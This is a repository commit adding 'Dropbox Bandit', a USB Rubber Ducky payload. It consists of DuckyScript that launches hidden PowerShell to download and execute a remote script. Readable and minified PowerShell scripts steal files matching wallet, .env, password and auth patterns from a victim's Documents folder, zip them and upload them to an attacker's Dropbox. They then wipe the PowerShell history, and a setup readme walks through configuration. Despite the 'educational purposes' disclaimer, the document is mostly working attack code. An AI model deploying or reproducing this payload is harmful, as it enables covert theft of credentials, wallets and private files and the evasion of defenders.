hak5
/
usbrubberducky-payloads
mirror of https://github.com/hak5/usbrubberducky-payloads.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #131 from Factor101/master 

Added Payload: Dropbox Bandit
pull/156/head
hak5glytch 2022-10-09 11:15:09 -06:00 committed by GitHub
parent e60dace1ea 45e9de99c8
commit 27bd65fad0
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
5 changed files with 197 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

77
payloads/library/exfiltration/Dropbox-Bandit/ex-readable-src.ps1 Normal file
View File

@ -0,0 +1,77 @@
# directory to steal from (ALL SUBDIRECTORIES INSIDE AS WELL)
$source = $env:USERPROFILE+"\Documents\*";
##############################################################################################
# Dropbox API values: Follow read.me tutorial to get these! #
##############################################################################################
# refresh_token
$refreshToken = "REFRESH_TOKEN_HERE";
# App key
$user = 'APP_KEY_HERE';
# App secret
$pass = 'APP_SECRET_HERE';
# temp directory to copy our files to
$dest = $env:TMP+"\cpy";
$n = 0;
$mb = 0;
# Delete the destination directory if it exists
if(Test-Path $dest) { rm -Path $dest -Force -Recurse; }
# find our files and copy them into the temp directory
GCI $source -R -I "*.txt","*wallet*","*.env",".x*",".doc*","*pass*","*auth*" | % {
$size = ((GCI $_.FullName).length/1MB);
# ignore files that are too big
if($size -lt 100) {
$mb += $size;
# once we come close to exceeding the dropbox upload limit we switch to a new folder
if($mb -ge 100) {
$mb = 0;
$n++;
}
ROBOCOPY $_.Directory ("$dest\$n\") $_.Name /MT 128 /NJH /NJS | Out-Null;
}
}
$creds = @{
grant_type = "refresh_token";
refresh_token = $refreshToken;
};
$headers = @{
"Authorization" = "Basic "+ [System.Convert]::ToBase64String([System.Text.Encoding]::ASCII.GetBytes("${user}:${pass}"));
"Content-Type" = "application/x-www-form-urlencoded";
};
$accessToken = (Invoke-RestMethod https://api.dropbox.com/oauth2/token -Method Post -Body $creds -Headers $headers).access_token;
Add-Type -AssemblyName System.IO.Compression.Filesystem;
$d=get-date -f MM-dd-yyyy;
$t=get-date -f HH-MM-ss;
# convert our files to zip files and then upload to dropbox
for($i = 0; $i -le $n; $i++)
{
$zip = "$env:TMP\$env:USERNAME-$i-$t.zip";
[System.IO.Compression.ZipFile]::CreateFromDirectory("$dest\$i\", $zip, 0, $false);
$target="/$(hostname)-$env:USERNAME/$d/$env:USERNAME-$i-$t.zip";
$arg = '{ "path": "' + $target + '", "mode": "add", "autorename": true, "mute": false }';
$headers = @{
"Authorization" = "Bearer $accessToken";
"Content-Type" = "application/octet-stream";
"Dropbox-API-Arg" = $arg;
};
Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $zip -Headers $headers | Out-Null;
}
# delete the temp directory
rm $dest -Force -Recurse;
# delete the zip files
for($i = 0; $i -le $n; $i++)
{
rm "$env:TMP\$env:USERNAME-$i-$t.zip" -Force;
}
# hide our traces (only will delay blue team -- not totally prevent them from seeing the traces)
Clear-History;
rm "$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\*";
exit;

19
payloads/library/exfiltration/Dropbox-Bandit/ex.ps1 Normal file
View File

@ -0,0 +1,19 @@
# directory to steal from (ALL SUBDIRECTORIES INSIDE AS WELL)
$s=$env:USERPROFILE+"\Documents\*";
# filetypes to exfiltrate
$fileTypes="*.txt","*wallet*","*.env","*.x*","*.doc*","*pass*","*auth*";
##############################################################################################
# Dropbox API values: Follow read.me tutorial to get these! #
##############################################################################################
# refresh_token
$r="REFRESH_TOKEN_HERE";
# App key
$u = 'APP_KEY_HERE';
# App secret
$p = 'APP_SECRET_HERE';
# do not touch below this line unless you know what you're doing
$ds=$env:TMP+"\cpy";$n = 0;$mb = 0;if(Test-Path $ds){rm $ds -Fo -R;}GCI $s -R -I $fileTypes|%{$sz = ((GCI $_.FullName).length/1MB);if($size -lt 100){$mb+=$sz;if($mb -ge 100){$mb = 0;$n++;}ROBOCOPY $_.Directory ("$ds\$n\") $_.Name /MT 128 |Out-Null;}}
$a=(Invoke-RestMethod https://api.dropbox.com/oauth2/token -Method Post -Body @{grant_type = "refresh_token";refresh_token = $r;} -Headers @{"Authorization" = "Basic "+ [System.Convert]::ToBase64String([System.Text.Encoding]::ASCII.GetBytes("${u}:${p}"));"Content-Type" = "application/x-www-form-urlencoded";}).access_token;
Add-Type -AssemblyName System.IO.Compression.Filesystem;$d=get-date -f MM-dd-yyyy;$t=get-date -f HH-MM-ss;for($i = 0;$i -le $n;$i++){$z="$env:TMP\$env:USERNAME-$i-$t.zip";[System.IO.Compression.ZipFile]::CreateFromDirectory("$ds\$i\",$z,0,$false);
Invoke-RestMethod https://content.dropboxapi.com/2/files/upload -Method Post -InFile $z -Headers @{"Authorization"="Bearer $a";"Content-Type"="application/octet-stream";"Dropbox-API-Arg"="{`"path`":`"/$(hostname)-$env:USERNAME/$d/$env:USERNAME-$i-$t.zip`",`"mode`":`"add`",`"autorename`":true,`"mute`":false}";}|Out-Null;}
rm $ds -Fo -R;for($i = 0;$i -le $n;$i++){rm "$env:TMP\$env:USERNAME-$i-$t.zip" -Fo;}Clear-History;rm "$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\*" -Fo;exit;

28
payloads/library/exfiltration/Dropbox-Bandit/payload.txt Normal file
View File

@ -0,0 +1,28 @@
REM Title: Dropbox Bandit
REM Author: Factor (github.com/Factor101)
REM Description: Extracts files from a specific location on a target's machine and uploads them to dropbox account
REM Target: Windows 10/11 (Powershell)
REM Version: 1.0
REM Category: Exfiltration
REM Legal: This script is for educational purposes only. This script is authorized auditing and security analysis purposes only where permitted subject to local and international laws where applicable. Users are solely responsible for compliance with all laws of their locality. This author claims no responsibility for unauthorized or unlawful use.
ATTACKMODE HID
REM Inital Delay
DELAY 500
REM Open CMD
GUI r
REM Delay to allow window to open
DELAY 100
REM Launch hidden powershell window to execute our script
REM Upload your ex.ps1 payload to pastebin or dropbox (or another website, if you want) and copy the URL here
REM if you're using dropbox ensure the link ends with ?dl=1 and not ?dl=0
REM if you're using pastebin ensure you're using the "raw" link e.g. http://pastebin.com/raw/<paste_id>
REM --------- replace me! ----------
STRINGLN powershell -w h -NoP -NonI -Exec Bypass "$e=$env:TMP+'\ex.ps1';iwr https://pastebin.com/raw/<paste_id> -O $e;iex $e;rm $e"
DELAY 200
REM Presses CAPSLOCK to indicate that payload is finished and you can remove the Ducky
CAPSLOCK
ATTACKMODE OFF

26
payloads/library/exfiltration/Dropbox-Bandit/payload_duckyscript_old.txt Normal file
View File

@ -0,0 +1,26 @@
REM Title: Dropbox Bandit
REM Author: Factor (github.com/Factor101)
REM Description: Extracts files from a specific location on a target's machine and uploads them to dropbox account
REM Target: Windows 10/11 (Powershell)
REM Version: 1.0
REM Category: Exfiltration
REM Inital Delay
DELAY 500
REM Open CMD
GUI r
REM Delay to allow window to open
DELAY 100
REM Launch hidden powershell window to execute our script
REM Upload your ex.ps1 payload to pastebin or dropbox (or another website, if you want) and copy the URL here
REM if you're using dropbox ensure the link ends with ?dl=1 and not ?dl=0
REM if you're using pastebin ensure you're using the "raw" link e.g. http://pastebin.com/raw/<paste_id>
REM --------- replace me! ----------
STRING powershell -w h -NoP -NonI -Exec Bypass "$e=$env:TMP+'\ex.ps1';iwr https://pastebin.com/raw/<paste_id> -O $e;iex $e;rm $e"
DELAY 200
ENTER
REM Presses CAPSLOCK to indicate that payload is finished and you can remove the Ducky
CAPSLOCK

47
payloads/library/exfiltration/Dropbox-Bandit/readme.md Normal file
View File

@ -0,0 +1,47 @@
# **Dropbox Bandit**
This payload is designed to target Windows 10/11 machines, but but may run on older versions of Windows. If you are using an older Rubber Ducky please use the "payload_duckyscript_old.txt" file.
This payload extracts files from a specific location on a target's machine and uploads them in archives to a dropbox account. The actual payload takes about 5 seconds to run (faster on real machines, tested on virtual machine), but the actual exfiltration, which is invisible to the victim one started, can take longer depending on the total size of data to be uploaded.
**Configuration:**
- Selects a folder (and thereby all subfolders) to extract files from
- Select filetype(s) or filename(s) to target
- Dropbox account to use
**Payload Anatomy:**
- The payload runs a hidden and windowless powershell window which then downloads and executes the powershell script from a url.
- The powershell script finds all the files that match the chosen parameters and copies them to a directory in %temp%\cpy\0
- Once the amount of files in the temporary directory exceeds 100mb, close to the dropbox upload size limit, the script creates a new subdirectory
- The script obtains a token from the dropbox api to be used for uploading later, using the refresh_token (see info on how to get this token below)
- The script archives each of our subdirectories into zip files in %temp%, named like this: `${USERNAME}-${MM-dd-yyyy}-${HH-MM-ss}.zip`
- The script uploads each zip file to this folder on your dropbox account: `${hostname}-{USERNAME}/${MM-dd-yyyy}/`
- The script deletes the zip files and temporary directory
- The script deletes local powershell history and logs
- Script exits
## **Setup**
- Create a new Dropbox account
- [Create a new "App"](https://www.dropbox.com/developers/apps/create)
-- Select "Scoped Access"
-- Select "Full Dropbox"
-- Name it whatever you want
-- Go the the "Permissions" tab and enable "files.content.write", and "files.metadata.write"
-- Go to the "Settings" tab and copy your "App key" and "App secret"
-- Go to the "Settings" tab -> OAuth 2 -> Generated Access token and copy the token that you generate. **Important: This token will expire in 4 hours**, so you will only use this one to get your refresh token
-- Enter this link in your browser: https://www.dropbox.com/oauth2/authorize?client_id=YOUR_APP_KEY_GOES_HERE&token_access_type=offline&response_type=code, but ensure you replace "YOUR_APP_KEY_GOES_HERE" with your app key from above
-- Click "Continue" and "Allow" and then copy the token it gives you. This is your "refresh_token"
- Now that we have all our dropbox information, download the powershell script "ex.ps1"
-- Set $s to the folder you want to exfiltrate data from
-- Set $fileTypes to the filters for what files you want to grab
-- Set $r to your refresh token from above
-- Set $u to your App Key
-- Set $p to your App Secret
-- Save the script
- Select all the code your newly modified powershell script, and upload it to any of these:
-- Dropbox: Upload the script as a .ps1 file and copy the download link, replacing ?dl=0 at the end with ?dl=1
-- Pastebin: Upload the text and copy the "raw" version of the URL, e.g. [pastebin.com/raw/<script id>]()
-- [Spectre](https://www.klgrth.io/) (Pastebin alternative), Upload the text and copy the url; make sure your add /raw to the end of your url
- Enter the url into payload.txt
- Compile your payload using payloadstudio
This script is for educational purposes only. This script is authorized auditing and security analysis purposes only where permitted subject to local and international laws where applicable. Users are solely responsible for compliance with all laws of their locality. This author claims no responsibility for unauthorized or unlawful use.